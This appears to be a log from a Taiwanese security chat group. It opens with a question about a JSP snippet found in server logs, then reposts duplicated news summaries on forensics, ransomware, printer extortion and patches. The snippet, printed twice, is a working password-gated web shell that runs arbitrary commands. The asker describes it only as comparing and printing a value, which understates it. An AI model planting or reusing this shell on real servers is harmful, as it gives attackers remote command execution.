Log for 網路攻防戰~資安閒聊群組
想請教熟悉JSP的高手,在Log有看到有人在表單塞了這段語法,它是想比對 pwd參數的內容等於024這個值,再印出來?
<% if("024".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
<% if("024".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
標題:不刷機不破壞Android系統,萃取訊連科技 U通訊APP 有效跡證
摘要:
本文將針對智慧型手機通訊軟體「U通訊」,運用ADB工具來備份手機App資料,萃取其相片聊天紀錄,並利用Cygwin模擬器和SQLite Database Browser來完整地分析所儲存的資訊,存留在手機的日誌檔也因為未加密容易被萃取出,藉此分析非法者遺留的數位證據,以找出有助於鑑識人員的資訊,避免不慎破壞原證據。
本文的實驗結果並不以刷機(Root)等破壞手機方式取得最高權限萃取證據,而是正確地使用ADB工具將「U通訊」中的犯罪跡證萃取出來,使得通訊內容得以進行解讀、保存以及分析。即便犯罪者利用相片聊天功能,還是可以將其訊息萃取出來再進行鑑識。
引用來源:
http://www.netadmin.com.tw/article_content.aspx?sn=1702080012
摘要:
本文將針對智慧型手機通訊軟體「U通訊」,運用ADB工具來備份手機App資料,萃取其相片聊天紀錄,並利用Cygwin模擬器和SQLite Database Browser來完整地分析所儲存的資訊,存留在手機的日誌檔也因為未加密容易被萃取出,藉此分析非法者遺留的數位證據,以找出有助於鑑識人員的資訊,避免不慎破壞原證據。
本文的實驗結果並不以刷機(Root)等破壞手機方式取得最高權限萃取證據,而是正確地使用ADB工具將「U通訊」中的犯罪跡證萃取出來,使得通訊內容得以進行解讀、保存以及分析。即便犯罪者利用相片聊天功能,還是可以將其訊息萃取出來再進行鑑識。
引用來源:
http://www.netadmin.com.tw/article_content.aspx?sn=1702080012
標題:資安人才缺乏,時刻要覺察
摘要:
這邊指的資安人員,是專門負責處理資安事務的人員,他和一般的資訊人員不完全相同。
懂得寫程式的,也許對於如何提升程式效率有很專精的研究,但不見得知道程式有那些撰寫的方式會形成漏洞。
同樣的,懂得網路如何串接,並不見得明瞭駭客攻擊的方式,所以資訊人員並不等於是資安人員,但很多大眾就把這兩類的人員畫上等號。甚至還有媒體記者,把手機達人也稱為資安顧問的笑話。
就實務經驗而言,一位資訊安全人員,必需要技術與管理的技能同時俱備。不但如此從網路、系統、軟體開發,甚至APP的應用,都要有一定程度的涉獵,更重要的則是需要有相關的實務經驗。如果只是理論派大將,或只會熟背某一套標準,但是如果沒有持續的精進,很快的還是會被市場所淘汰。
所以有些單位發生過安排人員上資安課程,但結果這些人員也都沒有從事資安工作。而那些在第一線作業的人員,因為沒有適當的訓練,也弄不清資安在做些什麼。
引用來源:
http://www.informationsecurity.com.tw/article/article_detail.aspx?tv=71&aid=8407
摘要:
這邊指的資安人員,是專門負責處理資安事務的人員,他和一般的資訊人員不完全相同。
懂得寫程式的,也許對於如何提升程式效率有很專精的研究,但不見得知道程式有那些撰寫的方式會形成漏洞。
同樣的,懂得網路如何串接,並不見得明瞭駭客攻擊的方式,所以資訊人員並不等於是資安人員,但很多大眾就把這兩類的人員畫上等號。甚至還有媒體記者,把手機達人也稱為資安顧問的笑話。
就實務經驗而言,一位資訊安全人員,必需要技術與管理的技能同時俱備。不但如此從網路、系統、軟體開發,甚至APP的應用,都要有一定程度的涉獵,更重要的則是需要有相關的實務經驗。如果只是理論派大將,或只會熟背某一套標準,但是如果沒有持續的精進,很快的還是會被市場所淘汰。
所以有些單位發生過安排人員上資安課程,但結果這些人員也都沒有從事資安工作。而那些在第一線作業的人員,因為沒有適當的訓練,也弄不清資安在做些什麼。
引用來源:
http://www.informationsecurity.com.tw/article/article_detail.aspx?tv=71&aid=8407
標題:勒索病毒盯上追劇族,利用 Netflix 帳號產生器當誘餌
摘要:
最近趨勢科技 發現 了一個勒索病毒,專門利用所謂的 Netflix 帳號產生器來誘騙貪小便宜的 Windows/PC 使用者。這類程式通常都是放在一些專門提供破解版應用程式或付費網站服務帳號密碼的網站。
這個勒索病毒會啟動一個執行檔 (Netflix Login Generator v1.1.exe),然後將自己複製一份 (netprotocol.exe),之後再執行一次。按下「Generate Login」(產生帳號) 按鈕之後,會出現另一個訊息視窗,裡面提供了一組 (據稱是) 真的 Netflix 帳號和密碼。然而 RANSOM_NETIX.A 顯示的這些帳號密碼產生視窗其實只是幌子,因為它正在背後將「C:\使用者\」資料夾下的 39 種類型的檔案加密。
此勒索病毒採用了 AES-256 加密演算法,並且將加密後的檔案副檔名改成「.se」。其勒索訊息當中要求支付 0.18 比特幣 (約合 100 美元) 的贖金。
引用來源:
https://blog.trendmicro.com.tw/?p=47470
摘要:
最近趨勢科技 發現 了一個勒索病毒,專門利用所謂的 Netflix 帳號產生器來誘騙貪小便宜的 Windows/PC 使用者。這類程式通常都是放在一些專門提供破解版應用程式或付費網站服務帳號密碼的網站。
這個勒索病毒會啟動一個執行檔 (Netflix Login Generator v1.1.exe),然後將自己複製一份 (netprotocol.exe),之後再執行一次。按下「Generate Login」(產生帳號) 按鈕之後,會出現另一個訊息視窗,裡面提供了一組 (據稱是) 真的 Netflix 帳號和密碼。然而 RANSOM_NETIX.A 顯示的這些帳號密碼產生視窗其實只是幌子,因為它正在背後將「C:\使用者\」資料夾下的 39 種類型的檔案加密。
此勒索病毒採用了 AES-256 加密演算法,並且將加密後的檔案副檔名改成「.se」。其勒索訊息當中要求支付 0.18 比特幣 (約合 100 美元) 的贖金。
引用來源:
https://blog.trendmicro.com.tw/?p=47470
雖然我超過義務役除役年齡( > 36 歲),不過還是邊看邊笑。
教召一查就中?他抱怨「根本報名系統」 網友哭:我也是...
http://www.ettoday.net/news/20170220/870505.htm
教召一查就中?他抱怨「根本報名系統」 網友哭:我也是...
http://www.ettoday.net/news/20170220/870505.htm
標題:Avast 釋出勒索軟體 CryptoMix 的離線版解密工具
摘要:
去年3月現身的CryptoMix有許多別名,包括CryptFile2、Zeta,以及最近的CryptoShield,當CryptoMix成功感染一台電腦時,它會與遠端的命令暨控制(C&C)伺服器聯繫,並建立用來加密檔案的金鑰,然而,若受害電腦無法連網,那麼CryptoMix就會以固定的金鑰來加密檔案。
Avast所提供的工具就是專門解開無法與C&C伺服器建立連線的離線版CryptoMix固定金鑰。
工具下載處:
https://www.avast.com/ransomware-decryption-tools#cryptomix
引用來源:
http://www.ithome.com.tw/news/112276
摘要:
去年3月現身的CryptoMix有許多別名,包括CryptFile2、Zeta,以及最近的CryptoShield,當CryptoMix成功感染一台電腦時,它會與遠端的命令暨控制(C&C)伺服器聯繫,並建立用來加密檔案的金鑰,然而,若受害電腦無法連網,那麼CryptoMix就會以固定的金鑰來加密檔案。
Avast所提供的工具就是專門解開無法與C&C伺服器建立連線的離線版CryptoMix固定金鑰。
工具下載處:
https://www.avast.com/ransomware-decryption-tools#cryptomix
引用來源:
http://www.ithome.com.tw/news/112276
標題:比特幣集體勒索又來了,這次鎖定全臺4千校!不只大學,桃園3小學也出現駭客勒索信
摘要:
先前才發生券商集體遭勒索威脅的事件,最近,臺灣學術網路危機處理中心(TACERT)旗下教育機構資安通報應變小組證實,桃園市有3家中小學的網路印表機收到駭客恐嚇信,要求受害學校支付3個比特幣(約10萬元新臺幣),否則會在3月1日發動攻擊癱瘓網路。
在桃園市政府教育局轉發給全市學校的ANA資安通報中提到,因部分學校印表機和物聯網使用預設密碼,以及大部分連線印表機使用外網IP,相關資訊暴露在網路上,才會遭到駭客入侵列印恐嚇訊息或作為攻擊工具。教育部也從受害小學通報後,不只發布ANA資安通報,也展開全臺4千所各級學校大盤點,了解遭勒索信威脅的情況,不過,截至2月22日還未完成清查。
檢驗防火牆規則,確認個別系統僅開放所需對外提供服務之通訊埠,若為印表機服務務建議阻擋port 9100。教育機構資安通報應變小組也通知全臺4千多所包含大學等各級學校提高戒備。
引用來源:
http://www.ithome.com.tw/news/112282
摘要:
先前才發生券商集體遭勒索威脅的事件,最近,臺灣學術網路危機處理中心(TACERT)旗下教育機構資安通報應變小組證實,桃園市有3家中小學的網路印表機收到駭客恐嚇信,要求受害學校支付3個比特幣(約10萬元新臺幣),否則會在3月1日發動攻擊癱瘓網路。
在桃園市政府教育局轉發給全市學校的ANA資安通報中提到,因部分學校印表機和物聯網使用預設密碼,以及大部分連線印表機使用外網IP,相關資訊暴露在網路上,才會遭到駭客入侵列印恐嚇訊息或作為攻擊工具。教育部也從受害小學通報後,不只發布ANA資安通報,也展開全臺4千所各級學校大盤點,了解遭勒索信威脅的情況,不過,截至2月22日還未完成清查。
檢驗防火牆規則,確認個別系統僅開放所需對外提供服務之通訊埠,若為印表機服務務建議阻擋port 9100。教育機構資安通報應變小組也通知全臺4千多所包含大學等各級學校提高戒備。
引用來源:
http://www.ithome.com.tw/news/112282
標題:MIS注意!OpenSSL剛修補了高嚴重性的DoS漏洞
摘要:
OpenSSL軟體基金會(OpenSSL Software Foundation)上周釋出了OpenSSL 1.1.0e以修補一個允許遠端駭客展開阻斷服務攻擊(DoS)的高嚴重性漏洞。
新的DoS漏洞是由紅帽的Joe Orton所提報,只影響OpenSSL 1.1.0,並未波及OpenSSL 1.0.2。
引用來源:
http://www.ithome.com.tw/news/112281
摘要:
OpenSSL軟體基金會(OpenSSL Software Foundation)上周釋出了OpenSSL 1.1.0e以修補一個允許遠端駭客展開阻斷服務攻擊(DoS)的高嚴重性漏洞。
新的DoS漏洞是由紅帽的Joe Orton所提報,只影響OpenSSL 1.1.0,並未波及OpenSSL 1.0.2。
引用來源:
http://www.ithome.com.tw/news/112281
標題:Flash漏洞補不完,Adobe一更新,微軟緊急跟進修補Windows
摘要:
嚴格說來它是Adobe的Flash Player漏洞,而非Windows漏洞,只是因為Windows中的瀏覽器內建了Adobe Flash Player而受到牽連,包括Windows 8.1、Windows 10、Windows RT 8.1、Windows Server 2012 R2與Windows Server 2016等視窗平台都必須更新。
至於Adobe則是在今年2月14日便修補了該漏洞。
微軟將此一安全更新列為重大(Critical)等級,修正了位於IE 10、IE 11與Microsoft Edge等瀏覽器中受影響的Adobe Flash程式庫。
引用來源:
http://www.ithome.com.tw/news/112283
摘要:
嚴格說來它是Adobe的Flash Player漏洞,而非Windows漏洞,只是因為Windows中的瀏覽器內建了Adobe Flash Player而受到牽連,包括Windows 8.1、Windows 10、Windows RT 8.1、Windows Server 2012 R2與Windows Server 2016等視窗平台都必須更新。
至於Adobe則是在今年2月14日便修補了該漏洞。
微軟將此一安全更新列為重大(Critical)等級,修正了位於IE 10、IE 11與Microsoft Edge等瀏覽器中受影響的Adobe Flash程式庫。
引用來源:
http://www.ithome.com.tw/news/112283